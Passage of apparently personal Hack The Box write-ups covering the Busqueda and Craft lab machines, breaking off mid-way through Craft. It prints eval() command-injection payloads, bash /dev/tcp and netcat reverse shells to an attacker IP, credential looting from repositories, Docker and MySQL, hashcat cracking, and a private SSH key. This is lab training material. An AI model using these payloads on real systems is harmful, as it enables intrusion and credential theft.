OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=10F%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F9%GCD
OS:=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E2
OS:NNT11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%W
OS:3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC=
OS:Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.54 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-05 00:10 CEST
Nmap scan report for 10.129.228.217
Host is up (0.027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-05 00:10 CEST
Nmap scan report for searcher.htb (10.129.228.217)
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1008.62 seconds

HTTP

After then I was greeted with a simple website with a form that lets you pick a search engine and look for data with a selected one. In the background I ran ffuf -u https://searcher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt to look for interesting directories and ffuf -u https://searcher.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.searcher.htb" for subdomains. Those results came back empty. There were also no comments in the website code.

Looking into the POST request with BurpSuite I noticed that the request changes depending if we check the “Auto redirect” box. Without the box checked - engine=DuckDuckGo&query=%2Fetc%2Fpasswd With the box checked - engine=DuckDuckGo&query=%2Fetc%2Fpasswd&auto_redirect=

Manual attempts at LFI didn’t work as the website filters / into their encoded %2F. I tried using multiple //, encoding and double-encoding dashes myself and using \ before and after them to confuse the filter, but it didn’t work. I tested for an RFI inputting http://127.0.0.1:80/../../etc/passwd into different parameters without any results.

I also looked through the engines to see if there isn’t a one that could be taken advantage of but I didn’t find such one. Too bad as we can make the server perform requests outside on our behalf and so this seems like such an opportunity for SSRF. I also can’t add custom engines in the POST request itself as it doesn’t go through.

I remembered that I saw IppSec using an SSTI (Server-Side Template Injection) method. SSTI is a vulnerability when user input is injected into a template engine (Flask uses one) to execute a payload as a template code. Template code is used to generate dynamic text like Hello {{username}}! to get Hello Azaeir! and such. I googled and found few payloads, interestingly when I run one of them it changed the response behavior. Weirdly enough engine=DuckDuckGo&query=<SSTI payload> and engine=DuckDuckGo&query=' both give the same empty response. This could be a strong error-based SSTI detection indicator or me just breaking the sites logic.

I tried a lot of different payloads and approaches to influence the template engine to no avail. I noticed that ' symbol is the one that makes the response blank. I was hoping that it was escaping some placeholder, script, or a function but I think even if it does, I can’t seem to take advantage of it.

Foothold

As I felt that I have fallen into a small rabbit hole with it, I decided to scope out of it and look for some public exploits. Wappalyzer found a lot of different components of the website so I went through some of them and Flask itself too. I found some GitHub repos taking about an exploit (Arbitrary CMD Injection) for Searchor 2.4.0 and 2.4.2, this could be what I’m looking for.

Reading up on the vulnerability, it comes from a vulnerable eval() function which is really funny as I just did the Craft machine which also took advantage of this insecure function!

So, I cloned this exploit to my local machine, run nc -lnvp 1337 and followed the syntax mentioned in the repository and in the script contents and got shell on the target host. What is actually pretty interesting about this shell is that it uses python as an execution method evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment" for a payload which is actually in encoded bash rev_shell_b64=$(echo -ne "bash -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64).

svc

On the target machine I was spawned in as a svc user. I looked manually for some interesting information, found the user flag but nothing at /home gave me way further although there was a .git file on it. I went back into the home directory of the user at /var/www/app and looked around for some other possible priv-esc vectors. In those files I found a .git folder which holds an initial repo commit data. In this data, I found a config file which hold a url that links the local repository with a remote one. This link hold embedded credentials for the user cody.

cody:jh1usoih2bkjaspwe92

I suspect that similar simple security vectors finally made Microsoft enforce a token authentication within GitHub. Besides the credentials we can also see another subdomain gitea.searcher.htb. I will add it into /etc/hosts just in case.

Privilege Escalation

Cody

Let’s try to authenticate into SSH with the new credentials and hope that the user reused their creds. Sadly they didn’t work on SSH but I accessed gitea.searcher.htb via browser and authenticated as cody - it went through.

Gitea seems to be a self-hosted git platform, similar to gogs - which is another similarity to Craft On it, I found a repository where cody and Administrator worked on the searcher webapp. I reviewed the code thoroughly, logic that is used to POST the search request looks quite vulnerable at the first glace.

if engine in Engine.__members__.keys():
	arg_list = ['searchor', 'search', engine, query]
	r = subprocess.run(arg_list, capture_output=True)
	url = r.stdout.strip().decode()

The script uses subprocesses library in Python which is generally used to call and execute other tools on the host like nc to make a script run a listener. This script takes user’s input (“engine” and “query”) and uses it to run the searchor, then returns its output (or redirects to it) without validating how that tool handles the input. The vulnerable part here is that there are no filters for a user, it supplies user input directly into the function’s logic.

I tried to test some payloads but none of them worked, unfortunately it looks like It won’t work. subprocess.run passes the input as a literal argument no matter what I put in there and not matter how I try to escape it. My payloads won’t get executed unless searchor itself would somehow mishandle them internally but that didn’t happen.

I decided to scope out from the gitea and try to do some more priv-esc enumeration before I ran any automated tools. Running sudo -l -S I got some information.

Matching Defaults entries for svc on busqueda:
 env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
 use_pty

User svc may run the following commands on busqueda:
 (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

It looks like my correct user has full root rights over the /opt/scripts/system-checkup.py python scripts.

sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py -h
<SNIP>
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
 docker-ps : List running docker containers
 docker-inspect : Inpect a certain docker container
 full-checkup : Run a full system checkup

Reading up on the help page, I can see that I can enumerate running containers.

svc@busqueda:/$ sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
<in/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 3 years ago Up 24 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 3 years ago Up 24 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db

Seeing the mysql_db container I looked up what data can be actually inspected, “.Config.Env” is a metadata field which gives basic configuration information and present variables of the container. I tried to run it like that sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect .Config.Env mysql_db but it didn’t work. I tried sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect ".Config.Env" mysql_db but it also didn’t work. Finally I found that in Go language, metadata is also parsed with double {’s so I tried with them sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect {{.Config.Env}} mysql_db and it worked.

Inside, I actually found some credentials - “MYSQL_ROOT_PASSWORD”, “MYSQL_USER” and “MYSQL_PASSWORD”.

svc@busqueda:/$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect "{{.Config.Env}}" mysql_db
<heckup.py docker-inspect "{{.Config.Env}}" mysql_db
[MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF MYSQL_USER=gitea MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh MYSQL_DATABASE=gitea PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin GOSU_VERSION=1.14 MYSQL_MAJOR=8.0 MYSQL_VERSION=8.0.31-1.el8 MYSQL_SHELL_VERSION=8.0.31-1.el8]

I assume that this is how the credentials should be related.

gitea:yuiu1hoiu4i5ho1uh
root:jI86kGUuj87guWr3RyF

I tried to connect to the database with this command, but it didn’t work mysql -u gitea -pyuiu1hoiu4i5ho1uh -h 127.0.0.1 -P 3306 which is unusual. Then I tried mysql -u gitea -p -h 127.0.0.1 -P 3306 to no avail.

I gave up on connecting to the mysql directly, this could be an issue with my shell and spawning another tool locally, so I just run commands one-by-one like so:

svc@busqueda:/var/www/app$ mysql -u gitea -pyuiu1hoiu4i5ho1uh -h 127.0.0.1 -P 3306 -e "SHOW DATABASES;"
<SNIP>
Database
gitea
information_schema
performance_schema

Then I looked at the tables:

mysql -u gitea -pyuiu1hoiu4i5ho1uh -h 127.0.0.1 -P 3306 -e "USE gitea; SHOW TABLES;"
<SNIP>
watch
webauthn_credential
webhook

And enumerated user data:

mysql -u gitea -pyuiu1hoiu4i5ho1uh -h 127.0.0.1 -P 3306 -e "USE gitea; SELECT * FROM user";

The information came out really scuffed, so I spent some time formatting it to be actually readable.

id	lower_name	name	full_name	email	keep_email_private	email_notifications_preference	passwd	passwd_hash_algo	must_change_password	login_type	login_source	login_nametype	location	website	rands	salt	language	description	created_unix	updated_unix	last_login_unix	last_repo_visibility	max_repo_creation	is_active	is_admin	is_restricted	allow_git_hook	allow_import_local	allow_create_organization	prohibit_login	avatar	avatar_email	use_custom_avatar	num_followers	num_following	num_stars	num_reposnum_teams	num_members	visibility	repo_admin_change_team_access	diff_view_style	theme	keep_activity_private
1	administrator	administrator		administrator@gitea.searcher.htb	0	enabled	ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2	pbkdf2	0	0	0		0			44748ed806accc9d96bf9f495979b742	a378d3f64143b284f104c926b8b49dfb	en-US		1672857920	1680531979	1673083022	1-1	1	1	0	0	0	1	0		administrator@gitea.searcher.htb	0	0	0	0	1	0	0	0	0		auto	0
2	cody	cody		cody@gitea.searcher.htb	0	enabled	b1f895e8efe070e184e5539bc5d93b362b246db67f3a2b6992f37888cb778e844c0017da8fe89dd784be35da9a337609e82e	pbkdf2	0	0	0		0304b5a2ce88b6d989ea5fae74cc6b3f3	d1db0a75a18e50de754be2aafcad5533	en-US		1672858006	1680532283	1680532243	1	-1	1	0	0	0	0	1	0cody@gitea.searcher.htb	0	0	0	0	1	0	0	0	0		auto	0

Here’s the data in a table:

ID	Name	Email	Password	Algorithm	Salt
1	administrator	administrator@gitea.searcher.htb	ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2	pbkdf2	a378d3f64143b284f104c926b8b49dfb
2	cody	cody@gitea.searcher.htb	b1f895e8efe070e184e5539bc5d93b362b246db67f3a2b6992f37888cb778e844c0017da8fe89dd784be35da9a337609e82e	pbkdf2	d1db0a75a18e50de754be2aafcad5533

What I see here are PBKDF2-HMAC-SHA256 password hashes. I have the password itself, algorythm mentioned and salt but I do not know the amount of the hashing iterations the passwords went through. This information is important to be able to actually crack the password. From my googling it seems like 50000 iterations is a standard. hashcat -m 10900 'sha256:50000:a378d3f64143b284f104c926b8b49dfb:ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2' wordlist.txt I ran this for a long time but nothing came out and it took too long so I pivoted to other possible vectors.

I thought of xp_cmdshell but it’s only on MSSQL and not on MySQLs. I tried reading and writing files but It didn’t work. I checked it with mysql -u root -pjI86kGUuj87guWr3RyF -h 127.0.0.1 -P 3306 -e "show variables like 'secure_file_priv'"; and it looks that mysql is restricted to only read and write files in /var/lib/mysql-files/.

Administrator

Quite disappointingly I ran out of ideas and tried to authenticate with the credentials I have to SSH and later to Gitea. Turns out that Administrator:yuiu1hoiu4i5ho1uh is a valid combo. This is a bit weird as the “root” password for the DB is different. I guess this just shows that it’s important to check every possible combination of acquired credentials.

I was able to access administrators gitea and enumerate the scripts inside, the one inside is system-checkup.py. From the code I learned that the scripts looks for a relative path when running full-checkup and want to run ./full-checkup.py.

I can create a bash reverse shell and rename it to full-checkup.py so that the script reads and executes my shell in process elevating my privileges. First I create the payload with echo -N "bash -c 'bash -i >& /dev/tcp/10.10.15.189/1338 0>&1;'" > full-checkup.sh change permissions so that it can be executed chmod +x full-checkup.sh and lastly I start a listener with nc -lnvp 1338.

Then when I run sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup and get a shell as root.

Closing Thoughts

Busqueda introduces a solid code review exercise, working with repositories and custom scripts. It’s heavy on careful code enumeration and gradual pivoting granting further access. Very fun and insightful!

Craft

EmilPawlak@protonmail.com (Emil Pawlak) — 04.04.2026

Enumeration

nmap

I started my nmap scan with sudo nmap -sC -sV -O -Pn 10.129.21.109; sleep 5; sudo nmap -p- -Pn 10.129.21.109; sleep 5; sudo nmap -sU -Pn 10.129.21.109

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:39 CEST
Nmap scan report for 10.129.21.109
Host is up (0.028s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
| 2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
| 256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_ 256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/2%OT=22%CT=1%CU=31105%PV=Y%DS=2%DC=I%G=Y%TM=69CE8DD5
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=103%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=1%ISR=108%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GC
OS:D=2%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E
OS:2NNT11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%
OS:W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:40 CEST
Nmap scan report for 10.129.21.109
Host is up (0.029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
6022/tcp open x11

Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 17:40 CEST
Nmap scan report for 10.129.21.109
Host is up (0.029s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1008.69 seconds

Port - 6022

I accessed the port 6022 and found this info in a simple clear text

SSH-2.0-Go
��ü)¹)“3bU=²¤���Œcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1���ssh-rsa���Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128���Maes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128���Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96���Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96���none���none�������������bq¯

Speed guide shows that port 6022 belong to the x11 service which is an X Window System. “The X Window System is a windowing system for bitmap displays, common on Unix-like operating systems.” ~ Wikipedia Here is a good read on the basic concept of x11.

craft.htb

The website on 443 at first didn’t work for me but now I can view it. Front page suggest that we will work with some API calls. both menu options use two new subdomains “api.craft.htb” and “gogs.craft.htb”. I will add them to my /etc/hosts and run ffuf to look for any other subdomains and to enumerate directories. ffuf -u https://craft.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 291 ffuf -u https://craft.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.craft.htb" -fs 3779

I also didn’t find any comments on the main website, it does use nginx 1.15.8.

api subdomain hosts different api calls. Two interesting one are authentication check to check validity of an authorization token and the authentication login to create the said token. gogs is a local git repo tools. I found some users related to it

administrator
ebachman Erlich Bachman
dinesh Dinesh Chugtai
gilfoyle Bertram Gilfoyle

I suspect there will be some API keys, tokens or creds in the repository by accident. I found a discussion about adding bogus ABV values; it was partially patched but still seems insecure, making it a potential attack vector for exploring API behavior.

Foothold

I this issue we can see this command holding a JWT token (JSON Web Token). curl -H 'X-Craft-API-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0.-wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"bullshit","brewer":"bullshit", "style": "bullshit", "abv": "15.0")}'

These tokens have three parts:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 - Header
eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0 - Payload
wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw - Signature

Depending on the cryptographic in place I could crack it, but I’d need to look into that more. Let’s check other information that we can find.

Later on that issue one of the users shows a commit with this patch which another developer find bad

+ # make sure the ABV value is sane.
+ if eval('%s > 1' % request.json['abv']):
+ return "ABV must be a decimal value less than 1.0", 400
+ else:
+ create_brew(request.json)
+ return None, 201

This is Python script, it checks if the user provided “abv” input is higher than 1, and depending on result of this check creates given outcomes. There are two interesting parts of the script for us. It uses eval() which is a known dangerous function in a number of different programming languages.It’s dangerous because it runs string data as an executable instruction. The second interesting part is that request.json['abv']) plainly outputs unfiltered user output into the command. Both of these weakness are bad on their own as one gives a possibility of command execution and another of command injection. Together they are a really great foothold opportunity.

parrot@parrot (~): curl -H 'X-Craft-API-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0.-wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"a","brewer":"a","style":"a","abv":"__import__(\"os\").system(\"id\")"}' 
{"message": "Invalid token or no token found."}

To try and attempt to exploit this vulnerability I’d have to have a valid token, meaning I’d have to find a not expired one in the wild or generate one which requires credentials.

I looked through the issues, repository and finally the commits and found some accidentally pushed credentials - dinesh:4aUh0A8PbVJxgd.

I used them to create my token request at the api dashboard.

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token')

Now when I try to exploit the vulnerable code my token goes through and I can test my injection payloads.

curl -H 'X-Craft-API-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNzc1MjA2MjQzfQ.1MRivtSjMK8IJKagIWHZRtp7M_632Rhp0vEk84UKYmU' -H "Content-Type: application/json" -k -X POST https://api.craft.htb/api/brew/ --data '{"name":"a","brewer":"a","style":"a","abv":"__import__("os").system("id")"}' 

This works too:

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token'); \
curl -X POST "https://api.craft.htb/api/brew/" -H "accept: application/json" -H "Content-Type: application/json" -d "{
\"id\": 0,
\"brewer\": \"0xdf\",
\"name\": \"beer\",
\"style\": \"bad\",
\"abv\": \"__import__('os').system('nc 10.10.15.189 1337 -e /bin/sh')\"}" -k -H "X-CRAFT-API-TOKEN: $TOKEN"

And this, finally works!

TOKEN=$(curl -s -k -X GET "https://dinesh:4aUh0A8PbVJxgd@api.craft.htb/api/auth/login" -H "accept: application/json" | jq -r '.token'); \
curl -X POST "https://api.craft.htb/api/brew/" -H "accept: application/json" -H "Content-Type: application/json" -d '{"id":0,"brewer":"0xdf","name":"beer","style":"bad","abv":"__import__(\"os\").system(\"nc 10.10.15.189 1337 -e /bin/sh\")"}' -k -H "X-CRAFT-API-TOKEN: $TOKEN"

I had a surprising amount of problems with quotation marks and escaping them correctly. I spent a lot of time tweaking these commands and breaking down the api logic locally.

For practice and better understanding of working with API, HTTP requests and Python I created a working script that exploits this vulnerability. The only requirements are to add api.craft.htb into the /etc/hosts and python3 to run it - you can view it on my Codeberg.

root

With this behind us we got a limited shell of the 5a3d243127f5 host on which we are root. Looking the root directory we can see the .dockerenv folder hinting that we’re inside of a container. Manual enumeration doesn’t show any interesting vectors besides the webapp files. In them we find dbtest.py which is a file we saw on gogs, it creates a query to a db from the POST data it gets. Database details like the credentials, destination and it’s name are said to be in some settings file. Moving into craft_api folder we can indeed find it. Inside, we can find the database details and a service token.

MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'

craft

I first tried to use mysql locally - but it isn’t installed - and call it remotely with mysql -u craft -pqLGockJ6G2J75O -h 10.129.22.88 - but this doesn’t work and hangs my shell. This is because the database isn’t local, it’s in fact on the db host which I assume is the Docker daemon. Due to the fact that my shell is connected to a simple web request it’s limited by the timeout time of the web server which is approximately 60 seconds. Due to that limitation, I was thinking how to best access the database. As my shell access was somewhat flimsy I didn’t want to bother setting up a chisel tunnel and work with transferring files - which also ruled out downloading mysql and similar tooling. What I stumbled upon was pymysql which is a python library for working with sql. As the whole box is somehow very Python for me from start until now, I decided to try it out.

With my 60 second window of opportunity I tested my commands and came up with a working one. python -c "import pymysql; c=pymysql.connect(host='db',user='craft',password='qLGockJ6G2J75O',db='craft'); cur=c.cursor(); cur.execute('SHOW TABLES'); print(cur.fetchall())" This command imports pymysql, connects to the database, creates a cursor which is a Python object that channels and sends the SQL queries to the database as well as simply show the queried data. You just need to adjust the query in the cursor and you can fetch any details from the database. Output from the above query showed me that there are two tables brew and user. Of course the latter is more interesting for us, so I ran another query. python -c "import pymysql; c=pymysql.connect(host='db',user='craft',password='qLGockJ6G2J75O',db='craft'); cur=c.cursor(); cur.execute('SELECT * FROM user'); print(cur.fetchall())" Which gave as further credentials:

((1, 'dinesh', '4aUh0A8PbVJxgd'), (4, 'ebachman', 'llJ77D8QFkLPQB'), (5, 'gilfoyle', 'ZEU3N8WNM2rh4T'))

Let’s try to access SSH with them.

gilfoyle

Sadly both on the normal port 22 and on the SSH via Go port 6022 I was unable to use it. There is however a login form on gogs. I found two public keys for the users, likely for authentication to gogs, nothing special, especially without the private keys.
dinesh: SHA256:8Fc2kZiv0Y+kjkh8atKr6brzBiM1DoDIhG6LN1ktPfA
gilfoyle: SHA256:D28DXyVaw0/mPuLBp3mDbS8z6oCRKS1hawJ5gxecFBQ

Digging further into gilfoyle I found that he had a private repository called craft-infra on which we can find his public and private SSH keys, likely to the dc host.

SSH private key

parrot@parrot (~/Desktop/htb/machines/craft): cat id_rsa 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDD9Lalqe
qF/F3X76qfIGkIAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDSkCF7NV2Z
F6z8bm8RaFegvW2v58stknmJK9oS54ZdUzH2jgD0bYauVqZ5DiURFxIwOcbVK+jB39uqrS
zU0aDPlyNnUuUZh1Xdd6rcTDE3VU16roO918VJCN+tIEf33pu2VtShZXDrhGxpptcH/tfS
RgV86HoLpQ0sojfGyIn+4sCg2EEXYng2JYxD+C1o4jnBbpiedGuqeDSmpunWA82vwWX4xx
lLNZ/ZNgCQTlvPMgFbxCAdCTyHzyE7KI+0Zj7qFUeRhEgUN7RMmb3JKEnaqptW4tqNYmVw
pmMxHTQYXn5RN49YJQlaFOZtkEndaSeLz2dEA96EpS5OJl0jzUThAAAD0JwMkipfNFbsLQ
B4TyyZ/M/uERDtndIOKO+nTxR1+eQkudpQ/ZVTBgDJb/z3M2uLomCEmnfylc6fGURidrZi
4u+fwUG0Sbp9CWa8fdvU1foSkwPx3oP5YzS4S+m/w8GPCfNQcyCaKMHZVfVsys9+mLJMAq
Rz5HY6owSmyB7BJrRq0h1pywue64taF/FP4sThxknJuAE+8BXDaEgjEZ+5RA5Cp4fLobyZ
3MtOdhGiPxFvnMoWwJLtqmu4hbNvnI0c4m9fcmCO8XJXFYz3o21Jt+FbNtjfnrIwlOLN6K
Uu/17IL1vTlnXpRzPHieS5eEPWFPJmGDQ7eP+gs/PiRofbPPDWhSSLt8BWQ0dzS8jKhGmV
ePeugsx/vjYPt9KVNAN0XQEA4tF8yoijS7M8HAR97UQHX/qjbna2hKiQBgfCCy5GnTSnBU
GfmVxnsgZAyPhWmJJe3pAIy+OCNwQDFo0vQ8kET1I0Q8DNyxEcwi0N2F5FAE0gmUdsO+J5
0CxC7XoOzvtIMRibis/t/jxsck4wLumYkW7Hbzt1W0VHQA2fnI6t7HGeJ2LkQUce/MiY2F
5TA8NFxd+RM2SotncL5mt2DNoB1eQYCYqb+fzD4mPPUEhsqYUzIl8r8XXdc5bpz2wtwPTE
cVARG063kQlbEPaJnUPl8UG2oX9LCLU9ZgaoHVP7k6lmvK2Y9wwRwgRrCrfLREG56OrXS5
elqzID2oz1oP1f+PJxeberaXsDGqAPYtPo4RHS0QAa7oybk6Y/ZcGih0ChrESAex7wRVnf
CuSlT+bniz2Q8YVoWkPKnRHkQmPOVNYqToxIRejM7o3/y9Av91CwLsZu2XAqElTpY4TtZa
hRDQnwuWSyl64tJTTxiycSzFdD7puSUK48FlwNOmzF/eROaSSh5oE4REnFdhZcE4TLpZTB
a7RfsBrGxpp++Gq48o6meLtKsJQQeZlkLdXwj2gOfPtqG2M4gWNzQ4u2awRP5t9AhGJbNg
MIxQ0KLO+nvwAzgxFPSFVYBGcWRR3oH6ZSf+iIzPR4lQw9OsKMLKQilpxC6nSVUPoopU0W
Uhn1zhbr+5w5eWcGXfna3QQe3zEHuF3LA5s0W+Ql3nLDpg0oNxnK7nDj2I6T7/qCzYTZnS
Z3a9/84eLlb+EeQ9tfRhMCfypM7f7fyzH7FpF2ztY+j/1mjCbrWiax1iXjCkyhJuaX5BRW
I2mtcTYb1RbYd9dDe8eE1X+C/7SLRub3qdqt1B0AgyVG/jPZYf/spUKlu91HFktKxTCmHz
6YvpJhnN2SfJC/QftzqZK2MndJrmQ=
-----END OPENSSH PRIVATE KEY-----

When I try to authenticate with ssh -i id_rsa gilfoyle@10.129.22.88 i get a message “Load key “id_rsa”: error in libcrypto”. From what I’ve read this can happen when SSH expects an older private key format called PEM. You can easily know which one is which by looking at the first line: New one: -----BEGIN OPENSSH PRIVATE KEY----- Old one: -----BEGIN RSA PRIVATE KEY-----

Luckily, the key can be formatted easily with ssh-keygen. First let’s make a copy of the original with cp id_rsa id_rsa-original and format the copy with ssh-keygen -p -f id_rsa -m PEM. When I tried to run this, I got another error stating Failed to load key id_rsa: error in libcrypto.

